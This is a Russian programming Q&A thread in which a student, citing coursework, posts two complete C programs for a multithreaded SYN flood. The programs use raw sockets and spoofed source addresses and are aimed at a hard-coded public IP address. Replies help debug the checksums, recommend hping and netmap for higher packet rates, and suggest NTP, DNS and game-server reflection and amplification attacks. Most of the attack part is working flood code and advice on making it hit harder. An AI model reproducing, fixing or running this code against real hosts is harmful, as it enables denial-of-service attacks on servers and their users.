SYN Flood DOS Attack. Как разобраться, что к чему и почему не работает?

Question

Александр Тихонов @tikhonov666

iOS, Swift, Objective-C

SYN Flood DOS Attack. Как разобраться, что к чему и почему не работает?

Пытаюсь организовать SYN Flood на сервер сугубо в научных целях ( курсач у меня такой)

За основу взял исходники: www.binarytides.com/syn-flood-dos-attack

Добавил многопоточность и подмену IP.

spoiler

/*
    /*
    Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<string.h> //memset
#include<sys/socket.h>
#include<errno.h> //For errno - the error number
#include<netinet/tcp.h>   //Provides declarations for tcp header
#include<netinet/ip.h>    //Provides declarations for ip header
#include<pthread.h>
#include<stdlib.h> //for exit(0);
#include<time.h>
#define MAXPTHREAD 5
#define PREY_PORT 80
void func(void * arg);
char * getRandStr();
struct pseudo_header    //needed for checksum calculation
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;

    struct tcphdr tcp;
};

unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;

    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }

    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;

    return(answer);
}

int main (void)
{
    srand(time(NULL));
    pthread_t thread;
    int i,pthreadResult;
    for(i=0;i<MAXPTHREAD; ++i)
    {
        pthreadResult=pthread_create(&thread,NULL,&func,getRandStr());
        if(pthreadResult!=0)
            err_sys("Error pthread: %d",i);
    }
    while(1)
        sleep(10);
    return 0;
}
void func(void * arg)
{
    //Create a raw socket
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    //Datagram to represent the packet
    char datagram[4096] , source_ip[32];
    //IP header
    struct iphdr *iph = (struct iphdr *) datagram;
    //TCP header
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;

    strcpy(source_ip , (char *)arg);

    sin.sin_family = AF_INET;
    sin.sin_port = htons(PREY_PORT);
    sin.sin_addr.s_addr = inet_addr ("85.113.47.5");

    memset (datagram, 0, 4096); /* zero out the buffer */

    //Fill in the IP Header
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
    iph->id = htons(54321);  //Id of this packet
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;      //Set to 0 before calculating checksum
    iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
    iph->daddr = sin.sin_addr.s_addr;

    iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

    //TCP Header
    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;      /* first and only tcp segment */
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
                should fill in the correct checksum during transmission */
    tcph->urg_ptr = 0;
    //Now the IP checksum

    psh.source_address = inet_addr( source_ip );
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);

    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

    //IP_HDRINCL to tell the kernel that headers are included in the packet
    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
    {
        printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
        exit(0);
    }

    //Uncommend the loop if you want to flood :)
    while (1)
    {
        //Send the packet
        if (
                sendto (s,      /* our socket */
                    datagram,   /* the buffer containing headers and data */
                    iph->tot_len,    /* total length of our datagram */
                    0,      /* routing flags, normally always 0 */
                    (struct sockaddr *) &sin,   /* socket addr, just like in */
                    sizeof (sin)) < 0)       /* a normal send() */
        {
            printf ("error\n");
        }
        //Data send successfully
//        else
//        {
//            printf ("Packet Send \n");
//        }
    }
    return;
}
char * getRandStr()
{
    char  str[32];
    str[0]='\0';
    strcat(str,"192.168.");
    char buffer[16];
    int nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    strcat(str,".");
    nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    //printf("str return: %s\n",str);
    return str;
}

spoiler

Дело в том, что когда запускаю программу, то резко возрастает нагрузка на ЦП (всего ведь 5 потоков) и перестаёт отвечать сеть. Проверить, что творится на атакуемом сервере невозможно, да и что-то мне подсказывает, что у него всё хорошо. Что я делаю не так? Как добиться желаемого SYN Flood Attack?

До этого, воздействовал на сервер простым запросом "GET /" в 500+ потоков и всё работало, так же на сервере была ощутима задержка с ответом.

Вопрос задан более трёх лет назад
5810 просмотров

Комментировать

Подписаться 5 Оценить Комментировать

Решения вопроса 2

1 комментарий

Комментировать

Пригласить эксперта

Ответы на вопрос 2

4 комментария

Power @Power

"Вам шашечки или ехать?" - очень известная фраза из одного очень известного анекдота (погуглите).
@throughtheether имел в виду, что непонятно, какая задача перед вами стоит:
а) выполнить syn flood атаку на сервер;
б) написать программу, которая умеет делать syn flood;
в) и то, и другое.
Если (а) - то воспользуйтесь готовым решением; если (б) - посмотрите исходники готового решения.
Но учтите, что syn flood - довольно тривиальная атака и хорошо настроенный сервер её даже не почувствует. Например, механизм SYN cookies уже встроен в ядро linux.
А ещё ваша подделка адресов отправителя может не иметь эффекта, т.к. действует в основном до первого роутера.

Написано более трёх лет назад
jcmvbkbc @jcmvbkbc

> Поставил wireshark, тестил на нём. Покеты SYN приходят в большом количестве и от разных IP. И вроде бы всё хорошо.
а мне говорит TCP checksum incorrect.

Написано более трёх лет назад
throughtheether @throughtheether

Я Вас не совсем понял.
@Power более доступно изложил[а] (и спасибо ему/ей за это).
Идеи пока в голову не приходят, пойду разбираться с hping.
Рекомендую заметку. Если тема курсовой работы - различные виды атак, то также рекомендую ознакомиться с атаками "отражения" и "умножения" (reflection/amplification attacks). В качестве "умножителя" трафика можно использовать сервер, работающий с протоколом поверх UDP и отвечающим на неаутентифицированные запросы (пример: ntp, выдающий список клиентов; dns open resolver; сервер counter-strike/другой игры, выдающий список игроков). Можно при определенных условиях добиться исчерпания канальной емкости "клиента", что будет означать недоступность сервера вообще.

Написано более трёх лет назад
Александр Тихонов @tikhonov666 Автор вопроса

@Power в)
Флуд с hping3 так же не дал результатов, скорее всего дело не в программе, а или в сервере, как упомянул @Power про SYN cookies, или в настройке роутера (пробовал отключать всю защиту, не помогло). На установление точной причины, пока не хватает знаний и опыта.
@throughtheether спасибо за рекомендации, обязательно это изучу.

Написано более трёх лет назад

Комментировать

Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации

Похожие вопросы

Linux

+2 ещё

Простой
Как создать ICQ сервер?
- 1 подписчик
- 5 часов назад
- 102 просмотра
1

ответ
Linux

+1 ещё

Простой
Как исправить ошибку?
- 1 подписчик
- 8 часов назад
- 64 просмотра
1

ответ
Linux

+1 ещё

Простой
Как выполнить rm без ошибок?
- 1 подписчик
- 9 часов назад
- 80 просмотров
3

ответа
C

+1 ещё

Средний
Нужен ХОРОШИЙ rpc для языка Си, есть ли решения?
- 1 подписчик
- 9 часов назад
- 80 просмотров
2

ответа
Linux

+1 ещё

Простой
Как изменить /dev/sda на другое название, и последствия?
- 1 подписчик
- 11 часов назад
- 86 просмотров
3

ответа
C++

Простой
Как вывести изображение без окна как у Desktop Goose на C++?
- 1 подписчик
- 11 часов назад
- 46 просмотров
0

ответов
C++

+2 ещё

Простой
Как исправить стиль линии прокрутки в QScrollArea?
- 1 подписчик
- 16 часов назад
- 23 просмотра
0

ответов
Linux

+2 ещё

Простой
Linux (Ubuntu, Gnome) необходимо небольшое окошко поверх всех остальных окон?
- 1 подписчик
- 17 часов назад
- 195 просмотров
3

ответа
Информационная безопасность

+1 ещё

Простой
Как запустить vbs с правами администратора, но без ввода пароля?
- 1 подписчик
- 17 часов назад
- 53 просмотра
1

ответ
C++

+2 ещё

Средний
Почему GCC не видит встроенную атомарную операцию?
- 2 подписчика
- 18 часов назад
- 334 просмотра
2

ответа
Показать ещё Загружается…

Программист C для Embedded Linux

Radiofid • Санкт-Петербург

от 120 000 до 180 000 ₽

Linux Администратор DevOps

ИМАГ • Москва

от 150 000 до 170 000 ₽

Программист C/C++ embedded Linux

РТК Автоматика • Москва

от 170 000 до 250 000 ₽

Ошибка в 1с при выгрузке товаров на сайт на Битриксе

25 апр. 2024, в 03:08

3000 руб./за проект

Создание и публикация короткого (reels) UGC-видео на YouTube-канале

25 апр. 2024, в 01:46

500 руб./за проект

Настроить перехват https-трафика для android-приложения

25 апр. 2024, в 01:02

10000 руб./за проект

Answer 1 · 2014-10-04 00:24:51

Какой-то бардак в исходниках:

struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));

что за struct ip?

iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);

htons?

iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

не iph->tot_len >> 1 а sizeof(*iph)

А вообще вы ограничьтесь посылкой одного пакета и посмотрите на него в каком-нибудть tcpdump или wireshark.

Answer 2 · 2014-10-04 12:42:09

Пытаюсь организовать SYN Flood на сервер сугубо в научных целях ( курсач у меня такой)

Что я делаю не так? Как добиться желаемого SYN Flood Attack?

Если вам надо ехать, то используйте hping. Если и шашечки нужны, то посмотрите в исходники этой утилиты.

Answer 3 · 2014-10-04 19:37:49

jcmvbkbc
struct ip

spoiler

/*
* Structure of an internet header, naked of options.
*/
struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ip_hl:4; /* header length */
unsigned int ip_v:4; /* version */
#endif
#if __BYTE_ORDER == __BIG_ENDIAN
unsigned int ip_v:4; /* version */
unsigned int ip_hl:4; /* header length */
#endif
u_int8_t ip_tos; /* type of service */
u_short ip_len; /* total length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
u_int8_t ip_ttl; /* time to live */
u_int8_t ip_p; /* protocol */
u_short ip_sum; /* checksum */
struct in_addr ip_src, ip_dst; /* source and dest address */
};

htons - функция, которая преобразуют номер порта в бинарный представление.
getRandStr() -да, спасибо. Исправил ошибку.

Получившиеся программа:

spoiler

/*
    Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<string.h> //memset
#include<sys/socket.h>
#include<errno.h> //For errno - the error number
#include<netinet/tcp.h>   //Provides declarations for tcp header
#include<netinet/ip.h>    //Provides declarations for ip header
#include<pthread.h>
#include<stdlib.h> //for exit(0);
#include<time.h>
#define MAXPTHREAD 8
#define PREY_PORT 80
void * func(void * arg);
char * getRandStr();
struct pseudo_header    //needed for checksum calculation
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;

    struct tcphdr tcp;
};

unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;

    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }

    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;

    return(answer);
}

int main (void)
{
    srand(time(NULL));
    pthread_t thread;
    int i,pthreadResult;
    for(i=0;i<MAXPTHREAD; ++i)
    {
        pthreadResult=pthread_create(&thread,NULL,&func,getRandStr());
        if(pthreadResult!=0)
            err_sys("Error pthread: %d",i);
    }
    while(1)
        sleep(10);
    return 0;
}
void * func(void * arg)
{
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    char datagram[4096] , source_ip[32];
    struct iphdr *iph = (struct iphdr *) datagram;
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;
    arg=(char *)arg;
    strcpy(source_ip , arg);

    sin.sin_family = AF_INET;
    sin.sin_port = htons(PREY_PORT);
    sin.sin_addr.s_addr = inet_addr ("85.113.47.5");

    memset (datagram, 0, 4096); /* zero out the buffer */

    //Fill in the IP Header
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 92; /// !!!!
    iph->tot_len = 576; /// sizeof (struct ip) + sizeof (struct tcphdr);
    iph->id = 1888; ///  //Id of this packet
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;      //Set to 0 before calculating checksum
    iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
    iph->daddr = sin.sin_addr.s_addr;

    iph->check = csum ((unsigned short *) datagram, sizeof(*iph));/// iph->tot_len >> 1);

    //TCP Header
    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;      /* first and only tcp segment */
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
                should fill in the correct checksum during transmission */
    tcph->urg_ptr = 0;

    psh.source_address = inet_addr( source_ip );
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);

    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
    {
        printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
        exit(0);
    }
    char * temp;
    while (1)
    {
        temp=getRandStr();
        iph->saddr = inet_addr ( temp );    //Spoof the source ip address
        sendto (s,      /* our socket */
                    datagram,   /* the buffer containing headers and data */
                    iph->tot_len,    /* total length of our datagram */
                    0,      /* routing flags, normally always 0 */
                    (struct sockaddr *) &sin,   /* socket addr, just like in */
                    sizeof (sin));// < 0)       /* a normal send() */
        free(temp);
    }

    return;
}
char * getRandStr()
{
    char * str=(char *)malloc(32+1);
    if(str==NULL)
    {
        printf("Not enough memory for \"malloc\"\n");
        exit(1);
    }
    str[0]='\0';
    strcat(str,"85.114.");
    char buffer[16];
    int nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    strcat(str,".");
    nextRandom=rand()%256;
    sprintf(buffer,"%d",nextRandom);
    strcat(str,buffer);
    return str;
}

Поставил wireshark, тестил на нём. Покеты SYN приходят в большом количестве и от разных IP. И вроде бы всё хорошо.
Когда непосредственно отправляю серверу, то результата нет. Запускаю на 7 потоках. Процессы загружены на ~100%, так что даже через браузер и через пинг не получается обратиться к серверу. После закрытия программы, быстро захожу на сайт, а ему хоть бы что.

throughtheether
Я Вас не совсем понял. Куда ехать и какие шашечки? Это юмор такой?) Быть может я не догоняю, т.к. начал заниматься этой темой 2 недели назад.
Идеи пока в голову не приходят, пойду разбираться с hping.

[UPDATE]
Получил отлично :)

Answer 4 · 2014-11-17 20:03:55

на не модифицированном ядре у вас врядле получится битрейт более 150-200 pps , если надо больше то юзайте фреймворк netmap он правда нормально работает только под freebsd но все же он может отправлять пакеты на скорости интерфейса не загружая при этом проц .

SYN Flood DOS Attack. Как разобраться, что к чему и почему не работает?

Войдите, чтобы написать ответ

Минуточку внимания

Войдите на сайт